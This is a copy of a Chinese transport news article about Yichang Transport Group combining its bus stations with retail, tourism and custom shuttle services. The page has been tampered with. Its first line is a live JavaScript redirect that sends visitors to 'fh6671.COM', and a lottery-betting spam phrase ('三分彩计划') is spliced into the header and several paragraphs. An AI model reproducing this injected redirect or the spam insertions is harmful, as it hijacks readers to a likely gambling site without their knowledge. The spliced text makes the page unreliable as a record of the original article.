function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

宜昌交运: 业态全覆盖 盘活成商圈

2020-11-18 09:27:20 来源:中国交通新闻网 作者: 记者 张英贤 通讯员 方雄 杨李根

早在2007年,“站商融合”便被湖北省宜昌交运集团提上转型议程,希望通过客流、物流的辐射带动商流的资源聚集。在宜昌城区,宜昌长途客运站(简称长途站)和位于宜昌火车东站旁的汽车客运中心站(简称中心站)在经过多年的建设后,商业氛围越来越浓。

突出交通优势 强化组客来源 

成也客流,败也客流。客运站的兴衰与客流量密切相关,同时也离不开城市交通的一体化规划。 

宜昌城市布局为狭长带状,城西为游客集散地,东部则是城市交通枢纽聚集地。宜昌交运集团在宜昌城区的两座客运站,拥有坐落在城区主干道的天然地理优势。随着宜昌“鱼骨式”BRT公交已形成“1走廊+36支线”的运营网络,星盘错落的公交枢纽将客运站场无缝连接起来。又得益于距离火车站较近,该企业跨区并购措施以及与其他客运企业的亲密合作,宜昌交运为以城际往来和公铁、公空中转为目的乘客提供了便捷的联程运输服务。 

“长途站、中心站门口建有公交站台,市民到客运站来换乘很方便。同时,开往各县市的城际公交乘车点基本坐落在城区主要道路干线重要公交站台,使多种交通枢纽很好地融合在一起。”宜昌交运相关负责人介绍,随着城镇化建设规模的不断扩大,中心站吸纳宜昌至近郊原城镇甚至城乡班线客源,形成了来源稳定的新客源结构。 

得益于市区位置与交通优势的双重便利以及源远流长的巴楚文化,客运站逐渐成为旅客出发与到达的集散地。“我们在城区客运站设置了游客集散中心,推广旅游产品,开展旅游咨询、门票预订等旅游服务,并在有条件、有资源的线路上搭配售卖景区门票,让一个车站同时成为旅客运输中心和游客集散中心。”宜昌交运相关负责人介绍。 

随着“站”功能的逐渐完善,宜昌交运推动站务与商业功能同步规划、同步建设、同步开发,通过经营交运超市、发展小件快运、提升物业价值,深度挖潜站场商业价值,寻求“以站促商、以商养站”的可持续发展之路。 

场站多元经营 商业效益最大化

售票厅井然有序、游客集散中心熙熙攘攘、商业区红红火火……随着站内经营业态的不断丰富,进站旅客可一站式体验“吃、住、行、游、购、娱”,多业态对旅客需求进行全覆盖,大幅提升了旅客体验。 

“如果死守旅客运输这项单一业务,客运站早已无法持续经营。在进行运游结合、站商融合等改造升级后,原本因客流下降导致的站场冷清、经营惨淡的局面得以扭转。”宜昌交运相关负责人介绍。 

盘活客运场站存量,变经营包袱为发展宝藏。目前,客运站已逐步从传统单纯经营旅客运输业务,转换为集旅客运输、小件物流、物业租赁、旅游服务等为一体的新型客运站。旅客从纯粹的乘客身份转换为集乘客、游客、消费者等多位一体的角色。 

三分彩计划土地要素是宜昌交运的发力点之一。“候车室、售票室等的规划和设计不能偏重于客运功能,要实现一站多用,商中有站、站中有商,力求多元化经营价值最大化。”宜昌交运相关负责人介绍,客运站应进一步发展成为集游客运输、汽车服务(加油、停车、美容)、商贸服务(自营门店、物业租赁)、物流服务(小件快运、随车运输)等多业态为一体的场所,同时根据城市规划和经营形势的变化,适时进行地产开发,为商业中心或写字楼经营等留下想象和操作空间。 

通过一系列措施调整之后,仅2019年,长途站、中心站在物业、广告类收益超过2400万元,经济收益增长明显。与此同时,客运站成为除商圈、写字楼之外又一饱受青睐的物业资源,优越的地理位置和客流资源以及规范的站场管理为投资者创造良好的经营环境,对外品牌效益提升。 

9月施行的《道路旅客运输及客运站管理规定》(简称新《客规》)指出,提升经营者经营自主权,明确允许客运站在满足基本服务功能前提下拓展旅游集散、邮政、物流等功能,充分利用客运站资源。 

“在政策引导下,我们将进一步做强自有小件快运业务、做优自营超市业务,引进酒店宾馆、超市卖场、餐饮小吃等业态,将传统车站打造成为具备多种业态的新商圈。”宜昌交运相关负责人介绍,随着宜昌旅游目的地品牌的建设,下一阶段中心站、长途站、游客中心将树立打造旅游大市场的理念,即中心站立足铁路、民航游客中转,长途站针对市区旅客出发,游客中心以港口为切入点综合推广陆地、水上旅游产品。

细分运输场景 推动小容量服务 

随着道路客运的转型,有的客运站场已经完全转为商业园区,有的客运站在逐步减少客运站用地,向便利化、信息化、小型化方向转变。 

受新冠肺炎疫情影响,旅客出行需求减少,长途站、中心站城区两站日均发送旅客1万余人次,高峰期逾2万人次,尚未恢复至去年水平。除了出行意愿大规模缩减外,旅客出行也已经转移到其他出行方式。定制化、小容量的交通出行方式大有可为。 

三分彩计划宜昌三峡机场地处偏远,多年来机场与城区之间的运输服务饱受诟病。“一直以来,我们的机场大巴业务虽在城区与机场往返线路上占重要比例,但固定的发班时间、乘车前排队购票、无法直达家门口等成为机场专线优质服务的硬伤。”宜昌交运相关负责人介绍。 

为改善这种现状,宜昌交运根据航班时间灵活调整车辆发班时间,做到旅客离开有车送达、旅客落地有车等候;宜昌交运还多次调整大巴在城区运行路线和乘车点,争取把旅客送到离家更近的位置,减少旅客城区中转。 

借助公司自有的“峡客行”网约车平台,宜昌交运已开通了宜昌至五峰的定制线路。“此外,我们正在积极探索机场专线的定制化运作,利用大巴开辟往返于城区与机场的运输专线,开展接送机服务,采用‘小车型、短间隔、定制化’的服务模式,力争实现门到门的运输。”宜昌交运负责人说,后期拟在短途班线、校园直通、企业通勤等方面开展定制化运输。 

为推动定制客运顺利开展,目前宜昌交运在两站共投放自助售取票机50余套,开发了“宜昌交运客运”线上购票平台,细分了城际公交、城际快车、机场巴士、校园直通车等客运服务场景,目前自助售票和线上售票已占总售票量的70%。两站还在现有基础上投放自助检票设备,引入身份证临时打印终端,开发电子发票功能。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。